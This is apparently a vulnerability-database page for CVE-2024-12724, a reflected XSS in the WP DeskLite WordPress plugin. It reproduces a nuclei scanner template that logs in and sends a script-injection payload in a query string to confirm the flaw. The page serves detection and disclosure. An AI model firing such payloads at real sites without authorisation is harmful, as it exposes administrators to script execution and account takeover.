Lucene search
K

WP DeskLite - Reflected XSS

🗓️ 10 Jul 2026 03:01:38Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

WP DeskLite up to 1.0.0 has reflected XSS from unsanitized output, enabling admin script execution.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-12724
6 Feb 202616:21
circl
CNNVD
WordPress plugin WP DeskLite 安全漏洞
15 May 202500:00
cnnvd
CVE
CVE-2024-12724
15 May 202520:06
cve
Cvelist
CVE-2024-12724 WP DeskLite <= 1.0.0 - Reflected XSS
15 May 202520:06
cvelist
EUVD
EUVD-2025-15310
3 Oct 202520:07
euvd
NVD
CVE-2024-12724
15 May 202520:15
nvd
Patchstack
WordPress WP DeskLite plugin <= 1.0.0 - Reflected XSS vulnerability
18 May 202523:37
patchstack
Positive Technologies
PT-2025-21432
15 May 202500:00
ptsecurity
RedhatCVE
CVE-2024-12724
17 May 202521:03
redhatcve
id: CVE-2024-12724

info:
  name: WP DeskLite - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    WP DeskLite WordPress plugin through 1.0.0 contains a reflected XSS caused by unsanitized and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires crafted request.
  impact: |
    Attackers can execute scripts in admin users' browsers, potentially leading to account takeover or unauthorized actions.
  remediation: |
    Update to the latest version with proper input sanitization and escaping.
  reference:
    - https://wpscan.com/vulnerability/9dd3ffaa-9020-47a6-bf9a-7e1412b9e9d5/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-12724
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-12724
    cwe-id: CWE-79
    epss-score: 0.00521
    epss-percentile: 0.4053
    cpe: cpe:2.3:a:codeflock:wp_desklite:1.0.0:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: codeflock
    product: wp_desklite
  tags: cve,cve2024,wordpress,wp,wp-plugin,xss,wp-desklite,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{RootURL}}/wp-admin/&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/edit.php?post_type=wpdl_ticket&"></script><script>alert(1)</script><script>=` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(1)</script><script>","wp-desklite")
        condition: and
# digest: 490a0046304402202790009d4aae854ef6f0ff6fb85e862045466141e753eeddf005d78e79c7c1b002203e7e4ea2f27925cb1fcb7ea2beb0f4fb3ea35f5c064b2ae003f37a969960d7e8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Feb 2026 16:21Current
6Medium risk
Vulners AI Score6
CVSS 3.16.1
EPSS0.00521
12